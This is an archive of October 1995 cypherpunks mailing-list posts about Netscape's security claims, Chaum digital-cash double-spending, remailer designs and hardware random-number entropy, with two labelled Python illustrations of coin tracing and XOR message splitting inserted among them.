To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
Message-ID: <9510190043.AA11578@all.net>
MIME-Version: 1.0
Content-Type: text


Boy, you people just don't appreciate anything that has a little bit of
humor mixed with a little bit of reality. 

1 - I can't believe that you failed to see any humor in the fifty ways
to leave your Netscape posting.  I would have thought some of you would
have noticed that a substantial number of these methods would work with
current W3 browsers! Do I really have to set up a URL to prove it to
you? If I do, what good will it do me?

2 - I can't believe that you all think that applets (a.k.a.  downloadable
programs at the push of a button) will make you safe.  The "we will only
run trusted applets and they will all be secure" attitude is 180 degrees
off base from my view.

3 - I would have figured at least one of you would have looked up the
chosen plaintext attack and told me why Netscape keys can't be gotten
at this way.  I think there's an off chance I could win a grand!

4 - If you just keep quiet, I may be able to get $50K out of Netscape
for a few minutes of typing.  If they can make a billion on hype, why
can't I make $50K?

5 - How much do you want to bet that within 12 months of my posting, at
least 10 of the 50 listed items will have happened in one form or
another? I got the same flaming 8 months ago when I mentioned that I
thought syslog could be gotten at because of the way it was designed.
I got piles of flames telling me to show code or stop smearing syslog.
Three months later, a syslog attack appeared, and three months later,
another one showed up.

6 - I think that it is the responsibility of the people who claim
"security" to tell us what they mean by it and to demonstrate why we
should believe them.  You may disagree, but I didn't see any flames when
I asked what they meant by secure only a few days ago.  I also didn't
see any answers.

7 - I got one assertion that the reason my earlier message was perceived
as malicious was because I started with the word WRONG!!!  It's probably
correct that that's why I got flamed for it, so from now on, I want you
all to design your mail filters to replace WRONG!!! in my postings with
I respectfully disagree.

8 - The first 50 flamers responding to this message get a free 1 Gigabyte
email message every day for the next week.  Anonymous remailers included.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Wed, 18 Oct 95 13:10:01 PDT
To: cypherpunks@toad.com
Subject: digital cash and identity disclosure
Message-ID: <m0t5ej6-0002ebC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi...

In the Cyphernomicon, section 12.6.6, Tim May writes:

             - Chaum went to great lengths to develop system which
                preserve anonymity for single-spending instances, but
                which break anonymity and thus reveal identity for double-
                spending instances. I'm not sure what market forces
                caused him to think about this as being so important, but
                it creates many headaches. Besides being clumsy, it
                require physical ID, it invokes a legal system to try to
                collect from "double spenders," and it admits the
                extremely serious breach of privacy by enabling stings.
                For example, Alice pays Bob a unit of money, then quickly
                Alice spends that money before Bob can...Bob is then
                revealed as a "double spender," and his identity revealed
                to whomver wanted it...Alice, IRS, Gestapo, etc. A very
                broken idea. Acceptable mainly for small transactions.

But as far as I got Chaums idea, Alice would not reveal Bobs identity,
but rather her own. Am I missing a point here?

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMIVd0EyjTSyISdw9AQFvAQP/bLDQV1JEIXPlUxbUqMVffv62YQf4j6Wu
IkTr0qMjP4PLpLZFyKus+uf3JQIYsK660LdDykmcKafdYMH8LW6Z4SxDkkd2HwyY
Hsf5xW3aIfnyQ5bPcI5dhWz4hao9RJ23Hc7sjzvHVgTcrQCLf7ADixhPCm7xnq3n
YffnXg5slHU=
=pLXN
-----END PGP SIGNATURE-----
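
The question above turns on whose identity is embedded in a coin. The following is an added illustration, not part of any post in this archive: a stripped-down Python sketch of the identity-revealing step in Chaum-Fiat-Naor style offline cash, where the identity belongs to whoever withdrew the coin. The account string, `K`, the fixed challenges and the hash commitment are assumptions made for the sketch; blind signing and cut-and-choose are left out.

```python
import hashlib
import secrets

K = 16  # identity pairs per coin (constructed; a real scheme sizes this for its tracing odds)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def commit(value, nonce):
    # Hash commitment standing in for the scheme's one-way functions (assumption).
    return hashlib.sha256(nonce + value).digest()


class Coin:
    """Built by the withdrawer. The bank would blind-sign `commitments` (omitted here)."""

    def __init__(self, identity):
        self._openings = []
        self.commitments = []
        for _ in range(K):
            left = secrets.token_bytes(len(identity))
            right = xor(left, identity)  # left XOR right == withdrawer's identity
            pair = [(left, secrets.token_bytes(16)), (right, secrets.token_bytes(16))]
            self._openings.append(pair)
            self.commitments.append(tuple(commit(v, n) for v, n in pair))

    def spend(self, challenge):
        # The payee's challenge bit selects which half of each pair is opened.
        return [self._openings[i][bit] for i, bit in enumerate(challenge)]


def verify(commitments, challenge, response):
    """Payee-side check that every opened half matches the signed commitment."""
    if not (len(challenge) == len(response) == len(commitments)):
        return False
    return all(commit(value, nonce) == commitments[i][bit]
               for i, (bit, (value, nonce)) in enumerate(zip(challenge, response)))


def trace_double_spend(first, second):
    """Bank-side: two deposit transcripts of one coin -> embedded identity, or None."""
    (ch1, resp1), (ch2, resp2) = first, second
    for i, (b1, b2) in enumerate(zip(ch1, ch2)):
        if b1 != b2:
            # Both halves of pair i are now known, so the XOR mask cancels.
            return xor(resp1[i][0], resp2[i][0])
    return None  # identical challenges: nothing beyond a single spend is learned


def scenario():
    """The situation from the quoted passage: Alice pays Bob, then spends the coin again."""
    alice_id = b"ALICE-ACCT-0001"  # constructed identity string
    coin = Coin(alice_id)
    # Payees normally draw random challenge bits; fixed here so the run is reproducible.
    ch_bob = [0] * K
    ch_carol = [0] * (K - 1) + [1]
    to_bob = (ch_bob, coin.spend(ch_bob))
    to_carol = (ch_carol, coin.spend(ch_carol))
    return alice_id, coin, to_bob, to_carol


if __name__ == "__main__":
    alice_id, coin, to_bob, to_carol = scenario()
    print("Bob accepts:  ", verify(coin.commitments, *to_bob))
    print("Carol accepts:", verify(coin.commitments, *to_carol))
    print("Bank traces:  ", trace_double_spend(to_bob, to_carol))
```

A single transcript contains only uniformly random halves, which is why one spend stays anonymous; the bank learns a name only when two transcripts for the same coin disagree on a challenge bit.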




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Julius A. Cisek" <jules@netscape.com>
Date: Wed, 18 Oct 95 21:43:53 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: [NOISE] Re: Postscript in Netscape
Message-ID: <199510190442.VAA11247@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM 10/18/95 -0400, you wrote:
>The point is, Netscape CLAIMS to provide security - Microsoft doesn't.

What do you mean by claim?  That a software "does something", right?  So if
a manual claims that copy will make a copy of a file, but someone has hacked
it to delete instead, isn't that the same thing?  Okay, it's a bad analogy
(take cover, a few more follow) but do you see my point?

Don't get me wrong.  I follow your logic, I just don't see how this will
benefit the internet business.  Many car manufacturers claim that their
air-bags make their cars safe, but do we expect them to add a disclaimer
that this is not the case when the car is set on fire?

When I buy The Club for my car am I expected to believe that it makes my car
invulnerable to burglary?  Yet the manufacturer "claims" just that!

I think pressing your idealism would render the word "secure" useless in any
situation, whether we're talking about software or diapers.

>On my machine, if you replace copy with delete, it will be detected
>before it does the delete, and, unless you are very skilled, when I tell
>it to copy, the corruption will be automatically corrected.  This is
>because I use an "integrity shell" - something you guys at Netscape
>probably never heard of. 

Personally, I haven't (but it sounds interesting).  So should the OS
provider tell its users to use the integrity shell?

I get the feeling you think we're all a bunch of fledgling and ignorant
fools here.  In reality some of the brightest people I've ever met work
here.  And everyone here is taking personal pride in our products and
staying very much on top of what's going on around us.  We're not trying to
pull a fast one, we really want this stuff to work (and I truly believe that
we make the best, most secure browser on the market, period).

>> There's a point at which one has to hand off the assessment to the buyer.
>
>The point I have been trying to make that many on this list seem to ignore
>again and again, is that Netscape makes the security claims.  If you don't
>provide effective protection, don't make the claim.  If you want to make
>the claim back it up with something other than media hype.

We really don't control the media hype (we certainly don't have the $$$ to
buy a Rolling Stones song) and it (the media) has the potential to hurt us
as much as it can help us.

Again, I see your point here, but this is capitalism after all.  I'm sure if
our "holes" are bad enough then we will be naturally selected out of the
picture.  I know, it would be nice to avoid the damage to the "customer",
but there is no way to do that.  The only way someone on the internet can be
truly secure (whatever that means) is not to be on it at all.  However, as a
user of the Navigator I'm not terribly paranoid about my security being
breached.  *To me* the product IS secure because breaching that security is
hard enough that in all likelihood no one will bother.

>	- making inadequately supported claims about a nebulous
>	thing called "security".

To me security doesn't mean anything absolute and I think it's wrong for
anyone to argue for absolute security because it's unachievable.  To me
security means making it harder for people to mess with my "stuff".
Therefore the Netscape claim is quite reasonable.

>	- using it as a basis to get people to invest millions (billions?)
>	of dollars.

People have invested in much more dangerous endeavors throughout history.
What's wrong with that?  And I'm sure there are people who are investing in
Netscape for other reasons (like, for example, because we're really cool,
which I can tell you is absolutely true <g>).

>	- plans to use it to move millions, and eventually billions of
>	dollars over the Internet, potentially placing a fair chunk of the
>	world economy (I'm not kidding) as well as individual privacy
>	(and thus freedom) at risk.

Not any more than credit cards are already doing!  Come on, a trash can at
K-Mart is a lot less secure than the Navigator.  I do understand the
difference, but there is no such thing as absolutely secure transactions
involving money in any medium.  The point is to try and make it hard enough
to make it a rare occurrence.  I feel that we do that.

>	- may succeed unless people who do understand the implications
>	find a way to fix the thing.

Maybe we will do that here!  <g>  Again, you're not giving us enough credit,
imho.

>These things concern me, so I will stand my ground regardless of the
>flames and ask, yet again, for someone at Netscape to tell us what you
>mean by "security" when you make claims about it 
>why your claims are strong enough for a big chunk of the world economy
>to rest on it. 

If we truly are so evil and/or stupid, people will find out and the
competition will crush us.  Frankly, I'm more worried about people who try
to "protect the ignorant masses" than a hacker who breaks my code for a
credit card transaction.

>(I won't repost my
>questions from a few days ago since you have already ignored them)

I did not ignore them.  I didn't see them.  They must have been in a thread
that was not interesting to me.  Also, I only casually glance at this group
when I have a free moment, which isn't very often.

Ugly disclaimer:
This post is not an official Netscape statement.  As a matter of fact it's
not a Netscape statement at all.  I am merely posting from my Netscape
account.  I'm truly sorry about this, but that's just part of the business.
Therefore, please don't make any "claims" based on this post.

~Jules (Julius Cisek)   /- __  -   mailto:jules@netscape.com
Server Eng, NETSCAPE  /\ >\=/\ --- http://home.netscape.com/people/jules
MtnView-CA-USA-Earth  \/   -\/ --  p:415.528.2968 f:415.528.4122
          ---===> COGITO ERGO VROOM <===---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 19:35:07 PDT
To: jules@netscape.com (Julius Cisek)
Subject: [NOISE] Re: Postscript in Netscape
In-Reply-To: <3085AE63.BB6@netscape.com>
Message-ID: <9510190231.AA15730@all.net>
MIME-Version: 1.0
Content-Type: text


> Dr. Frederick B. Cohen wrote:
> > I respectfully disagree. Netscape claims to be "secure" - hence it is Netscape's job to
> > be secure - regardless of the user's use of their product.  Otherwise,
> > the ads should read:
> > 
> >         "Netscape can be used securely by sufficiently knowledgeable
> >         users who have emasculated their postscript interpreters before
> >         using them to view files of unknown origin, and who have removed
> >         all other known, unknown, and/or undisclosed security holes from
> >         their systems.  Otherwise, Netscape is insecure and should not be
> >         trusted."
> 
> Err...  If software companies were to follow your line of logic, software
> boxes (all sorts of software) would become covered with fine print.  As
> would ads for the software.  Although I'm sure industry lawyers would
> welcome that, personally I think it would be quite sad.

The point is, Netscape CLAIMS to provide security - Microsoft doesn't.

> 
> A stupid example:
> I can replace copy on your machine so that it does a delete instead.
> Does that mean that the OS manufacturer has to warn a user about this?

On my machine, if you replace copy with delete, it will be detected
before it does the delete, and, unless you are very skilled, when I tell
it to copy, the corruption will be automatically corrected.  This is
because I use an "integrity shell" - something you guys at Netscape
probably never heard of. 

> There's a point at which one has to hand off the assessment to the buyer.

The point I have been trying to make that many on this list seem to ignore
again and again, is that Netscape makes the security claims.  If you don't
provide effective protection, don't make the claim.  If you want to make
the claim back it up with something other than media hype.

> This is my own opinion and also that of anyone who agrees with me.
> I'm reading this group because it's very interesting for me personally.
> There.

All of our opinions are our own, and my opinion is that Netscape (not you) is:

	- making inadequately supported claims about a nebulous
	thing called "security".

	- using it as a basis to get people to invest millions (billions?)
	of dollars.

	- plans to use it to move millions, and eventually billions of
	dollars over the Internet, potentially placing a fair chunk of the
	world economy (I'm not kidding) as well as individual privacy
	(and thus freedom) at risk.

	- may succeed unless people who do understand the implications
	find a way to fix the thing.

These things concern me, so I will stand my ground regardless of the
flames and ask, yet again, for someone at Netscape to tell us what you
mean by "security" when you make claims about it (I won't repost my
questions from a few days ago since you have already ignored them) and
why your claims are strong enough for a big chunk of the world economy
to rest on it. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 23:13:37 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <3085AE63.BB6@netscape.com>
Message-ID: <3085EB9F.5C18@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> > Dr. Frederick B. Cohen wrote:
> > > I respectfully disagree. Netscape claims to be "secure" - hence it is Netscape's job to
> > > be secure - regardless of the user's use of their product.  Otherwise,
> > > the ads should read:
> > >
> > >         "Netscape can be used securely by sufficiently knowledgeable
> > >         users who have emasculated their postscript interpreters before
> > >         using them to view files of unknown origin, and who have removed
> > >         all other known, unknown, and/or undisclosed security holes from
> > >         their systems.  Otherwise, Netscape is insecure and should not be
> > >         trusted."
> >
> > Err...  If software companies were to follow your line of logic, software
> > boxes (all sorts of software) would become covered with fine print.  As
> > would ads for the software.  Although I'm sure industry lawyers would
> > welcome that, personally I think it would be quite sad.
> 
> The point is, Netscape CLAIMS to provide security - Microsoft doesn't.

  Here is a quote from Microsoft's Internet Explorer 2.0 Beta announcement,
which can be found at http://www.microsoft.com/windows/pr/sept2895.htm:


    Internet Explorer 2.0 also provides users with a secure environment.
    Complete support for Secure Sockets Layer (SSL) and RSA encryption
    allows integration with secure sites. In addition, Internet
    Explorer 2.0 will support Private Communication Technology (PCT),
    which is an efficient and secure upgrade to the SSL protocol.
    Internet Explorer will also support Secure Transaction Technology
    (STT), an electronic payment technology jointly developed by
    Microsoft and Visa International, as soon as it is available. 

  There is that pesky word "secure", five times in one paragraph.

> >
> > A stupid example:
> > I can replace copy on your machine so that it does a delete instead.
> > Does that mean that the OS manufacturer has to warn a user about this?
> 
> On my machine, if you replace copy with delete, it will be detected
> before it does the delete, and, unless you are very skilled, when I tell
> it to copy, the corruption will be automatically corrected.  This is
> because I use an "integrity shell" - something you guys at Netscape
> probably never heard of.

  What if they replace your "integrity shell"?

> > There's a point at which one has to hand off the assessment to the buyer.
> 
> The point I have been trying to make that many on this list seem to ignore
> again and again, is that Netscape makes the security claims.  If you don't
> provide effective protection, don't make the claim.  If you want to make
> the claim back it up with something other than media hype.

  We are working on clarifying our security claims.  Here is an
example from the San Jose Mercury news on Aug. 17, 1995:

    "We have said for a long time that given the right amount of
    computer power, that a 40-bit key encrypted message could be
    decrypted," said Mike Homer, Netscape's vice president of marketing. 

> > This is my own opinion and also that of anyone who agrees with me.
> > I'm reading this group because it's very interesting for me personally.
> > There.
> 
> All of our opinions are our own, and my opinion is that Netscape (not you) is:
> 
>         - making inadequately supported claims about a nebulous
>         thing called "security".

  Here is one definition of the word "security" from the Webster's
New World Dictionary, Third Edition:

    protection or defense against attack, espionage, etc.

  Note that I make no claims that this is Netscape's definition of
security in our products.

>         - using it as a basis to get people to invest millions (billions?)
>         of dollars.

  Billions of dollars have not been invested in Netscape.  An examination
of the prospectus and the current stock price will bear this out.

  Here is a quote from the Netscape prospectus:

    The Company has included in its products an implementation of the
    Secure Sockets Layer ("SSL"), a security protocol which operates in
    conjunction with encryption and authentication technology licensed
    from RSA Data Security, Inc. ("RSA").  Despite the existence of
    these technologies, the Company's products may be vulnerable to
    break-ins and similar disruptive problems caused by Internet users.
    Such computer break-ins and other disruptions would jeopardize the
    security of information stored in and transmitted through the
    computer systems of end users of the Company's products...

  Of course anyone who is interested in investing in Netscape's
stock should get and read the entire prospectus.

>         - plans to use it to move millions, and eventually billions of
>         dollars over the Internet, potentially placing a fair chunk of the
>         world economy (I'm not kidding) as well as individual privacy
>         (and thus freedom) at risk.

  It would have to be many billions of dollars before it becomes
"a fair chunk of the world economy", and I think that even the
most optimistic projections of internet commerce put that many
years in the future.

>         - may succeed unless people who do understand the implications
>         find a way to fix the thing.
> 
> These things concern me, so I will stand my ground regardless of the
> flames and ask, yet again, for someone at Netscape to tell us what you
> mean by "security" when you make claims about it (I won't repost my
> questions from a few days ago since you have already ignored them) and
> why your claims are strong enough for a big chunk of the world economy
> to rest on it.

  I don't think that it is reasonable to expect that everyone who
asks for an official company position on some random mailing list
will get a response.  The people who make such statements are not
usually on such lists, and they have other forums for making public
statements.  Perhaps you should call our PR department for a statement.

  You are certainly free to "stand your ground", but I am also
free to not respond to you.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blake@io.org (Blake Harris)
Date: Wed, 18 Oct 95 23:40:10 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120347.UAA27336@infinity.c2.org>
Message-ID: <Zhchw8RRq4nf084yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510120347.UAA27336@infinity.c2.org>, sameer wrote:
> 
> 	I completely agree that the reporters on this list make things
> very difficult and people do need to be very careful about posting
> things which will get misinterpreted by reporters.. but--
> 
> 	This list is -not- an "announcement" list. If I see a
> potential bug, I want other cypherpunks to tell me whether I am onto
> something or not, so I would post. If some idiot reporter takes that
> and writes an article saying "XXX has a hole" that is -EXTREMELY BAD
> REPORTING-.
> 	I understand though, that we can't control what the reporters
> say and how they interpret what we say. It is very important to word
> your posts carefully such that when you post a bug a reporter won't
> think that they should write an article on it until it is verified.
> 	It's very sad, though, that we have to be very careful about
> what we post now because of the media attention. I would prefer if the
> list could just be a forum where we can discuss things, but that is
> not the case.
> 

Folks:

Don't lose heart completely that your discussions on this list are
not being read carefully by some of the media. As a case in point, I'm a
freelance magazine writer who has been lurking on this list for at least 6
months (although I do get behind at times due to the volume). My reason
for doing so is to become familiar enough with crypto issues so I
might be able to write intelligently about these at some point in the
future.

Bad or superficial reporting is just that. It is part of a writer's job
to understand what he is writing about, or at least understand it enough
to be able to accurately inform the uninformed about something.

You shouldn't be too disheartened about mis-reporting regarding this
list because there is definitely something you can do about it -- at
least after the fact. There is nothing that makes a sincere writer
squirm more than his getting his facts wrong or even inadvertently
misinforming his readers.

If someone mis-reports something which is discussed on the cypherpunk
list, a letter to the editor clearly pointing out the factual error not
only has a good chance of getting printed, but also places the writer in
an uncomfortable position of having egg on his face with his colleagues,
bosses, etc. And while this might not undo the damage done by the
original article, the writer or reporter is subsequently likely to
check his facts a lot more carefully when writing about the topic
again (unless he or his editors have a hidden agenda).

Which isn't to say that the writers and reporters who lurk here will
necessarily agree completely with the general cypherpunk views regarding
crypto-anarchy and other such matters.

However, this is a high quality mail list and the more writers
and reporters lurking here, the more chance there is that your views
will be understood and given serious consideration. And those views will
increasingly surface as at least _one_ point of view presented in media
articles, whether they specifically mention cypherpunks or not.

Worthwhile ideas, if a few people keep putting them out there, have a
way of permeating a culture in strange and sometimes almost untraceable
ways. Or as Margaret Mead put it: "Never doubt that a small group of
thoughtful, committed citizens can change the world; indeed, it's the
only thing that ever does."


... back into lurk mode.

-- Blake Harris






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Oct 95 00:33:42 PDT
To: cypherpunks@toad.com
Subject: crypto export from the UK
Message-ID: <199510190728.AAA02916@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Could people in the UK please tell me what the crypto export
laws are like there? I know someone who wrote some really great crypto
code in the UK but isn't willing to distribute it because of crypto
export laws... I was under the impression that it was legal to export
crypto from the UK.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 18 Oct 95 21:32:53 PDT
To: cypherpunks@toad.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
Message-ID: <9510190432.AA04434@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From die Wed Oct 18 21:42:07 1995
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
To: roy@cybrspc.mn.org
Date: Wed, 18 Oct 1995 21:42:07 -0400 (EDT)
From: "Dave Emery" <die@pig.die.com>
Reply-To: die@die.com
In-Reply-To: <951017.172824.4H9.rnr.w165w@cybrspc.mn.org> from "Roy M. Silvernail" at Oct 17, 95 05:28:24 pm
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1135      

Roy Silvernail writes:

> This comes from the fact that PROMs are typically mask-programmed at the
> fabrication stage.  EPROMS are programmed in the field.  And yes, if you
> could get the top of the chip off cleanly, you could erase and reprogram
> them.  (not likely, and hardly undetectable, but it's ever so slightly
> possible)  More often, I see these devices called OTP (for One Time
> Programmable).  In the more standard types (27C256, for example),
> they're a fraction of the cost of the erasable ones.  Ceramic cases and
> quartz windows are spendy.

	Perhaps someone with more semiconductor physics background
can correct me, but my understanding is that some kinds of nuclear
radiation can be used to erase OTP EPROMS.   I suppose this might damage
the crystal lattice badly enough to render the device useless in
some bit positions or reduce data retention time a lot, but I sure
wouldn't bet any security on devices out there not being 
arbitrarily reprogrammable (thus using bits to represent digital
coins in a wallet that get reset when they are spent is not a
good idea).

						Dave Emery
						die@die.com

> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goldberg@superlink.net
Date: Wed, 18 Oct 95 22:40:15 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510190543.BAA28883@mars.superlink.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 PM 10/14/95 -0700, anonymous-remailer@shell.portal.com wrote:
>Has anyone examined the legislative history associated with this statute?
>
>I would be surprised if they were singling out anonymous remailers.  They
>may have had other concerns regarding phone abuse, e.g., long distance fraud.
>
>Then again, I could be full of it...
>
>
Doesn't necessarily matter what the legislative history was.  When some
prosecutor trying to make a name for himself hooks onto this language to
prosecute an anonymous remailer or other perceived miscreant, nobody will
remember what the intent was.  The casebooks are full of perversions of
original intent.
Jon Goldberg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 19 Oct 95 01:48:30 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <DGoAr7.L5s@sgi.sgi.com>
Message-ID: <199510190848.BAA13416@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGoAr7.L5s@sgi.sgi.com>, kelso@netcom.com (kelso) writes:

> Hi,
> One method to take the heat off of the last remailer
> in a chain would be to call on our friend the "one
> time pad".  A message is split into two equal parts
> that only make sense when the two parts are 'xor'ed
> together.  The separate parts are then sent through
> different paths to the final recipient (or newsgroup).
> The reader would have to 'xor' the parts together in
> order to read the message.  The remailer could not be
> blamed (as the message was unreadable to him).

> The drawback is that the message would be unreadable
> until both pieces showed up.

No, the drawback is that then all the readers of the newsgroup would
complain that this remailer was cluttering up the newsgroup with
unreadable garbage.  Twice.

Here's another modest proposal.  I note that once you've sent a message,
there appears to be no way for a recipient to reply without knowing who
the originator is.  A simple addition to the remailer protocol would be
to encrypt the message and the control information separately.  This
would allow the sender of a message to provide a pre-packaged method for
returning a reply.  The recipient of the original message could then
just blindly send his reply to the starting point remailer specified in
the original message by tacking the pre-packaged routing information on
to the front of his message.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com
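
The XOR split quoted at the top of the message above can be written out in a few lines. This is an added example, not code from any poster: it generalizes the two-part split to n parts, and `consistent_partner` shows why one part alone says nothing about the content. The function names and the sample strings are constructed for the illustration.

```python
import secrets
from functools import reduce


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def split(message, n=2):
    """Split `message` into n shares; XOR of all n shares restores it.

    n - 1 shares are fresh one-time pads, the last is the message XORed
    with every pad. Pads must never be reused for another message.
    """
    if n < 2:
        raise ValueError("need at least two shares")
    pads = [secrets.token_bytes(len(message)) for _ in range(n - 1)]
    last = reduce(xor, pads, message)
    return pads + [last]


def combine(shares):
    """Recombine shares that arrived over different paths."""
    if len({len(s) for s in shares}) != 1:
        raise ValueError("shares must all have the same length")
    return reduce(xor, shares)


def consistent_partner(share, candidate):
    """For a 2-way split: the partner share under which `share` decodes to `candidate`.

    Such a partner exists for every candidate of the same length, so a holder
    of one share cannot rule any message in or out. Only the length leaks.
    """
    if len(share) != len(candidate):
        raise ValueError("candidate must match the share length")
    return xor(share, candidate)


if __name__ == "__main__":
    msg = b"constructed sample post"      # constructed input
    part_a, part_b = split(msg)
    print(part_a.hex())
    print(part_b.hex())
    print(combine([part_a, part_b]))
    decoy = b"another 23-byte message"    # same length as msg
    print(combine([part_a, consistent_partner(part_a, decoy)]))
```

Each share is uniformly random on its own, which also means every share looks like noise to anyone who receives only that share.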




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: suednim@censored.org (Sue Dee Nim)
Date: Thu, 19 Oct 95 00:12:28 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
Message-ID: <199510190013.AAA04544@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I somehow think they've only gotten started.

Sue....Alice's cousin, waiting on real e$$$$ to start.

>Dr. Frederick B. Cohen wrote:
>> 
>> Jeff Weinstein - Electronic Munitions Specialist Wrote:
>> 
>> ...
>>         "Netscape can be used securely by sufficiently knowledgeable
>>         users who have emasculated their postscript interpreters before
>>         using them to view files of unknown origin, and who have removed
>>         all other known, unknown, and/or undisclosed security holes from
>>         their systems.  Otherwise, Netscape is insecure and should not be
>>         trusted."
>
>  Why did I know you would be showing up in this discussion?  You
>wouldn't be related to alice de 'nonymous would you?
>
>  I don't believe that Netscape claims to be some magic bullet that
>will suddenly make your system secure when you install it.  We also
>don't claim that it will detect viruses.
>
>  Don't you think we've wasted enough bandwidth on this?  I'm sure
>most readers of this list are sick of it by now.
>
>	--Jeff
>
>-- 
>Jeff Weinstein - Electronic Munitions Specialist
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 19 Oct 95 04:15:00 PDT
To: William.Soley@Eng.Sun.COM
Subject: Re: Simple Hardware RNG Idea
Message-ID: <acabee1b010210040955@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 PM 10/5/95, Simon Spero wrote:
>On Thu, 5 Oct 1995, Norman Hardy wrote:
....
>> You presumably use the oddness of the count for your random bit in some
>> predetermined time interval. External radiation can change, but not bias
>> the parity. If the counter saturates, the counter may be biased towards one
>
>Hmmm. But isn't this method slightly biased? If the probability of  N
>events < the probability of N+1 events, wouldn't you need a large number
>of events per bit to make the bias insignificant?
....
What you really need is entropy (information). I propose concatenating
several counts and sending them thru MD5. The counts are distributed the
same way but are independent so that the entropy of the concatenation is
the sum of the entropies. Each count has a Poisson distribution. That tells
you how many bits of entropy there are in the input to the MD5. Take that
many bits, rounded down, as your random bits.

If there are an average of x bits in a time interval then the probability
that the count will be exactly K is (x^K/(K!))exp(-x). That is the Poisson
distribution. The entropy is then:

- sum[K=0 to infinity]  (x^K/(K!))exp(-x)log( (x^K/(K!))exp(-x))
= - sum[K=0 to infinity] (x^K/(K!))exp(-x)(log(x^K/(K!)) - x)
= - sum[K=0 to infinity] (x^K/(K!))exp(-x)(K*log(x) - log(K!) - x)

Here is a klutzy Scheme program to evaluate these:
(define (sum g)(letrec ((ss (lambda (n)
         (if (= n 0) (g 0) (+ (g n) (ss (- n 1)))))))
           (ss 30)))
(define (log2 x)(/ (log x)(log 2)))
(define (fact n)(if (= n 0) 1 (* n (fact (- n 1)))))
(define (p x k) (* (/ (expt x k)(fact k))(exp (- x))))
(define (en n)(sum (lambda(x) (let ((c (p x n)))
  (if (= c 0) 0 (* c (log2 c)))))))

(en 1) => 2.07
(en 3) => 2.92
(en 10) => 3.73
(en 15) => 4.0


I.e. if 1 count is expected on average there are two bits of entropy
in the count (surprising!) and if the count averages 10 then there
